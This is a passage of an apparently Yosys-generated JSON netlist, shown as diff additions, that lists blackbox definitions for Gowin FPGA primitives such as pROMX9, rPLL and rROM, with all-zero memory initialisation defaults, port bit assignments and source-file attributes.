"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLK": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "OCE": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + }, + "AD": { + "direction": "input", + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "DO": { + "direction": "output", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:741.14-741.16" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:738.12-738.14" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:738.7-738.10" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:742.15-742.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:739.7-739.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:740.7-740.12" + } + } + } + }, + "pROMX9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:746.1-819.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100100", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLK": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "OCE": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + }, + "AD": { + "direction": "input", + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "DO": { + "direction": "output", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:817.14-817.16" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:814.12-814.14" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:814.7-814.10" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:818.15-818.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:815.7-815.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:816.7-816.12" + } + } + } + }, + "rPLL": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1818.1-1861.10" + }, + "parameter_default_values": { + "CLKFB_SEL": "internal", + "CLKOUTD3_SRC": "CLKOUT", + "CLKOUTD_BYPASS": "false", + "CLKOUTD_SRC": "CLKOUT", + "CLKOUTP_BYPASS": "false", + "CLKOUTP_DLY_STEP": "00000000000000000000000000000000", + "CLKOUTP_FT_DIR": "1", + "CLKOUT_BYPASS": "false", + "CLKOUT_DLY_STEP": "00000000000000000000000000000000", + "CLKOUT_FT_DIR": "1", + "DEVICE": "GW1N-1", + "DUTYDA_SEL": "1000 ", + "DYN_DA_EN": "false", + "DYN_FBDIV_SEL": "false", + "DYN_IDIV_SEL": "false", + "DYN_ODIV_SEL": "false", + "DYN_SDIV_SEL": "00000000000000000000000000000010", + "FBDIV_SEL": "00000000000000000000000000000000", + "FCLKIN": "100.0", + "IDIV_SEL": "00000000000000000000000000000000", + "ODIV_SEL": "00000000000000000000000000001000", + "PSDA_SEL": "0000 " + }, + "ports": { + "CLKOUT": { + "direction": "output", + "bits": [ 2 ] + }, + "CLKOUTP": { + "direction": "output", + "bits": [ 3 ] + }, + "CLKOUTD": { + "direction": "output", + "bits": [ 4 ] + }, + "CLKOUTD3": { + "direction": "output", + "bits": [ 5 ] + }, + "LOCK": { + "direction": "output", + "bits": [ 6 ] + }, + "CLKIN": { + "direction": "input", + "bits": [ 7 ] + }, + "CLKFB": { + "direction": "input", + "bits": [ 8 ] + }, + "FBDSEL": { + "direction": "input", + "bits": [ 9, 10, 11, 12, 13, 14 ] + }, + "IDSEL": { + "direction": "input", + "bits": [ 15, 16, 17, 18, 19, 20 ] + }, + "ODSEL": { + "direction": "input", + "bits": [ 21, 22, 23, 24, 25, 26 ] + }, + "DUTYDA": { + "direction": "input", + "bits": [ 27, 28, 29, 30 ] + }, + "PSDA": { + "direction": "input", + "bits": [ 31, 32, 33, 34 ] + }, + "FDLY": { + "direction": "input", + "bits": [ 35, 36, 37, 38 ] + }, + "RESET": { + "direction": "input", + "bits": [ 39 ] + }, + "RESET_P": { + "direction": "input", + "bits": [ 40 ] + } + }, + "cells": { + }, + "netnames": { + "CLKFB": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1820.7-1820.12" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1819.7-1819.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1829.8-1829.14" + } + }, + "CLKOUTD": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1832.8-1832.15" + } + }, + "CLKOUTD3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1833.8-1833.16" + } + }, + "CLKOUTP": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1831.8-1831.15" + } + }, + "DUTYDA": { + "hide_name": 0, + "bits": [ 27, 28, 29, 30 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1827.13-1827.19" + } + }, + "FBDSEL": { + "hide_name": 0, + "bits": [ 9, 10, 11, 12, 13, 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1823.13-1823.19" + } + }, + "FDLY": { + "hide_name": 0, + "bits": [ 35, 36, 37, 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1826.18-1826.22" + } + }, + "IDSEL": { + "hide_name": 0, + "bits": [ 15, 16, 17, 18, 19, 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1824.13-1824.18" + } + }, + "LOCK": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1830.8-1830.12" + } + }, + "ODSEL": { + "hide_name": 0, + "bits": [ 21, 22, 23, 24, 25, 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1825.13-1825.18" + } + }, + "PSDA": { + "hide_name": 0, + "bits": [ 31, 32, 33, 34 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1826.13-1826.17" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1821.7-1821.12" + } + }, + "RESET_P": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1822.7-1822.14" + } + } + } + }, + "rROM": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:514.1-589.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100000", + "BLK_SEL": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": 